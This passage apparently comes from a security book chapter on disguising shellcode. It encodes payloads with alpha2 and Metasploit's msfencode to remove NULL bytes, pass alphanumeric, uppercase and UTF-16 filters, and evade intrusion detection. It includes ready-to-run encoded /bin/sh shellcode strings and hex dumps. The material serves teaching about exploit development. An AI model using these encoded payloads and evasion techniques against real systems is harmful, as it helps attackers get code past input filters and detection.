Disguising Shellcode

Shellcode injection doesn't always make it into memory untouched. It can pass through functions that may reject or alter the payload; for example, the use of str*( ) functions will truncate the payload to the first NULL character. Some functions sanitize entries, such as checking that all characters are alphanumeric. Other functions may transform their entry, (e.g., into uppercase). And last but not least, classic payloads may be detected by an IDS.

Thus, it is very desirable to control the shape of a payload, avoiding forbidden characters or mutating, to prevent being detected by an IDS looking for known patterns. Shellcode done by hand can be written with those imposed properties, but it will usually be more convenient to create a shellcode without those limitations and change its shape later. A common approach is to write a loader by hand with those properties that will decode any payload and to append our encoded shellcode. Many tools can automate this step.

alpha2 is a shellcode encoder for x86 that is able to transform an arbitrary sequence of instructions into a fully alphanumeric one. It also provides uppercase output and shellcode capable of being converted into Unicode.

A problem with alphanumeric shellcode on x86 is not entirely resolved, though. The in-place decoding technique needs to know which address the shellcode has been injected into. A piece of code recovering this address is classically called a getPC[31] code. There is no known alphanumeric getPC code yet. A solution for the moment uses Structured Exception Handlers (SEH) on Windows. It works well, but it is not universal. Another common solution is to provide the shellcode with its position or a place to get it. In both cases, we do not have a one-size-fits-all solution.

Once we get specific about platforms and operating systems, things get lot easier. If the target is on Windows, we can use the SEH getPC. On Unix, if we target a specific vulnerability, then we know the state of the process at the time of exploitation. As shellcode has been injected somewhere, there should have been a place where the address of this "somewhere" has been stored. This is the place we have to know before generating the shellcode.

For example, let's test the encoded shellcode with the loader presented earlier in this chapter in the section "A Shellcode Loader." The way the shellcode is called is:

0x080484e4 <main+240>:  call   *%eax

This means that when the shellcode gets called, EAX points to it. Thus, we just have to tell alpha2 to generate a shellcode that will use the content of the EAX register to learn its location and decode its payload:

$ alpha2 eax < hello.egg > alpha.egg
$ chmod +x alpha.egg
$ ./alpha.egg
Hello world!
$ cat alpha.egg
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIpUOym53gV6bskXuPgpwp7p3kk1o
3l5YoKO9oK3JLwlilnm1mHXNmoCBxuP7p5PnYuSWps0Wp8s95nm65jx1vy5K9kaMSytJPMofaC0c05P
MhfdUP5PUPLzVn30ePWpRsNikKzmmPqKoyzXv3OKtEwpUPGpXMopQKlMau8tqK1NQOkyO3CxQurLrL2
OwP1grO0rRLU4wQUZUPGzA

Obviously, if we do the same with another register, it will not work:

$ alpha2 ebx < hello.egg > alpha.egg
$ ./alpha.egg
Segmentation fault (core dumped)

alpha2 is also able to generate shellcode with only uppercase characters. This allows it to survive any data manipulation that converts input to uppercase characters:

$ alpha2 --uppercase eax < hello.egg
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIF5MYZEPWQFPSJHUPC05P
EP1KMQO3JUKOKOKOLCJL5LKLLMSM9HLM83PX5PEPUPOIC330C030JSOULMPU8XSVY5K9N1LCJDJPOOE
QUPEPS0OHS45PUPS0OJTNEPS0UPV3MYKK8MMPQKLIZXQCOKUUUP5PS0XMMPQKLMREL41KQNQOXIISW8
U5RLRLROWPRWROT2BLU4Q14JUPDJA

Many Windows programs will convert entries to Unicode UTF-16 encoding. Strings using ASCII encoding will have a NULL ASCII character inserted after each byte on little-endian architectures. alpha2 is able to generate a string that, when passed through an ASCII to UTF-16 encoding transformation, will become an equivalent to the shellcode provided in input.

First, turn the shellcode into a string suitable for transformation:

$ ./alpha2 --nocompress --unicode eax < binsh.egg > binsh.unicode.not.egg.yet

Then simulate what would occur during an ASCII to UTF-16 translation with this small Python code:

>>> import codecs
>>> not_egg_yet = open("binsh.unicode.not.egg.yet").read( )
>>> egg = not_egg_yet.encode("utf_16")[2:]
>>> open("binsh.unicode.egg","w").write(egg)

Finally, run it:

$ chmod +x ./binsh.unicode.egg
$ ./binsh.unicode.egg
sh-3.1$

Metasploit Framework comes with a program called msfencoder that can encode shellcodes. It provides many encoding techniques suitable for most cases on x86. Other architectures support tends to be poor, as we can see from the list of existing encoders:

$ ./msfencode -l
Framework Encoders
==================

    Name                       Rank         Description
    ----                       ----          -----------
   cmd/generic_sh          normal      Generic Shell Variable Substitution Command
                                           Encoder
   generic/none            normal      The "none" Encoder
   ppc/longxor             normal      PPC LongXOR Encoder
   ppc/longxor_tag         normal      PPC LongXOR Encoder
   sparc/longxor_tag       normal      SPARC DWORD XOR Encoder
   x86/alpha_mixed         low         Alpha2 Alphanumeric Mixedcase Encoder
   x86/alpha_upper             low         Alpha2 Alphanumeric Uppercase Encoder
   x86/avoid_utf8_tolower  average     Avoid UTF8/tolower
   x86/call4_dword_xor     normal      Call+4 Dword XOR Encoder
   x86/countdown           normal      Single-byte XOR Countdown Encoder
   x86/fnstenv_mov         normal      Variable-length Fnstenv/mov Dword XOR
                                           Encoder
   x86/jmp_call_additive   great       Polymorphic Jump/Call XOR Additive Feedback
                                           Encoder
   x86/nonalpha            low         Non-Alpha Encoder
   x86/nonupper            low         Non-Upper Encoder
   x86/shikata_ga_nai      excellent   olymorphic XOR Additive Feedback Encoder
   x86/unicode_mixed       low         Alpha2 Alphanumeric Unicode Mixedcase
                                           Encoder
   x86/unicode_upper       low         Alpha2 Alphanumeric Unicode Uppercase Encoder

Table 10-1 lists the supported options.

Let's examine msfencoder by beginning with this shellcode generated by GCC:

$ ./hello.egg
Hello world!
$ hd hello.egg
00000000  55 89 e5 57 56 53 e8 00  00 00 00 5b 81 c3 f5 ff  |U..WVS.....[....|
00000010  ff ff 83 ec 1c fc 8d 7d  d8 8d b3 58 00 00 00 b9  |.......}...X....|
00000020  03 00 00 00 f3 a5 8d 55  d8 66 a5 89 d1 83 e4 f0  |.......U.f......|
00000030  bf 01 00 00 00 b8 04 00  00 00 ba 0e 00 00 00 53  |...............S|
00000040  89 fb cd 80 5b 89 f8 53  bb 05 00 00 00 cd 80 5b  |....[..S.......[|
00000050  8d 65 f4 5b 5e 5f c9 c3  48 65 6c 6c 6f 20 77 6f  |.e.[^_..Hello wo|
00000060  72 6c 64 21 0a 00 0a                              |rld!...|
00000067

Note that there are many 0x00 characters that will stop str*( ) functions. Injection would be partial. We need to remove them. By default, msfencoder will only encode using the shikata ga nai default encoding method (a Japanese colloquialism roughly translatable as "there is no choice" or "it can't be helped"). We have to give the additional constraint of avoiding 0x00 characters with the -b '\x00' option. msfencoder will try all encoders ordered by rank until one returns an acceptable result:

$ ./msfencode -t raw -b '\x00' < hello.egg > encoded.egg
[*] x86/shikata_ga_nai succeeded, final size 131

$ chmod +x encoded.egg
$ ./encoded.egg
Hello world!

Now we have a 131-byte shellcode equivalent to the original 103 byte shellcode, but without any NULL characters:

$ hd encoded.egg
00000000  db c4 d9 74 24 f4 58 29  c9 b1 1b bb 9d aa 66 bf  |...t$.X)......f.|
00000010  31 58 17 83 e8 fc 03 c5  b9 84 4a a0 34 ad e2 1c  |1X........J.4...|
00000020  14 c6 0d a0 9a 16 55 21  59 e3 96 de a1 8f 85 3c  |......U!Y......<|
00000030  a2 1d 28 e4 d7 ad 8b 14  e8 d1 92 17 e8 d1 e4 e4  |..(.............|
00000040  4d 5c b1 d2 e8 fa b3 33  77 e0 34 0c 79 e9 b4 72  |M\.....3w.4.y..r|
00000050  c2 ed b4 72 32 54 ba 72  32 a8 90 fb c9 65 96 a0  |...r2T.r2....e..|
00000060  a4 8e c4 ed b2 6e eb 11  70 ee b0 9c ef 1b 1d c0  |.....n..p.......|
00000070  b0 2a 61 b4 2b c1 0a 2b  94 6e bc c1 b8 f4 63 2f  |.*a.+..+.n....c/|
00000080  41 ff 63                                          |A.c|
00000083

msfencode also includes some features and capabilities borrowed from the alpha2 tool, such as the following:

$ ./msfencode -t raw  -e x86/alpha_upper < binsh.egg > binsh_alpha.egg
[*] x86/alpha_upper succeeded, final size 141

$ cat binsh_alpha.egg
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIFQIPF0E6F0E6BHFMD0M
YJFBHFOD3CXNJK0D4GTESNJE8FOBBCYBNLIJCF0QFQCLIKQK9HBNPDKHMK0HLAA
$ chmod +x binsh_alpha.egg
$ ./binsh_alpha.egg
sh-3.1$


[31] PC means Program Counter; i.e., the register that keeps the address of the currently executed instruction. It is called EIP on x86.